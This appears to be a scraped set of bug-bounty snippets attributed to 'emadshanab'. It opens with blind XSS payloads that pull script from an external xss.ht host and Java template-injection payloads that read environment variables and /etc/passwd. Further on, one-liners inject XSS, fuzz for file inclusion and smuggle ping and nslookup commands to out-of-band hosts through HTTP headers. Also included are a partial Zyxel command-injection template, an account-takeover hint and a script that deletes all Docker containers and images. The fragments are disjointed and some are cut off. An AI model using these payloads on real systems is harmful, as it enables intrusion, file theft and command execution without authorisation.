emadshanab

"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')

emadshanab

• Typically java ssti payloads start with $. But if that character is banned you can use * instead of that.

• Get env vars

*{T(java.lang.System).getenv()}

• Read files (/etc/passwd)

emadshanab

assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
 
assetfinder https://exmple.com | gau --subs https://exmple.com  | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
  
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
  
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H 

emadshanab

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt

emadshanab

#Finding subdomains via Nmap. 

nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000.lst

nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub10000.lst

nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub100000.lst

nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000000.lst

emadshanab

site.com/file.php
response = nothing

http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours, 

emadshanab

```FFUF
-fc (filter code): hidden
-mc (match code): match/only
-w: read from stdout (coding 1 line)
-ic: ignore comments in wordlists (headers, copyright notes, comments, etc.)
```

```Payloads 
ffuf -u http://10.10.226.27/FUZZ -w /opt/seclists/raft-medium-words-lowercase.txt -c -e .php,.txt
```

emadshanab

inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com

emadshanab

id: CVE-2022-30525-initial-detect

info:
  name: Zyxel Unauthenticated Remote Command Injection
  author: z3r00t
  severity: info
  tags: CVE-2022-30525,Zyxel RCE

requests:
  - method: GET

emadshanab

#!/bin/bash
# kill current docker
docker kill $(docker ps -q)
# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)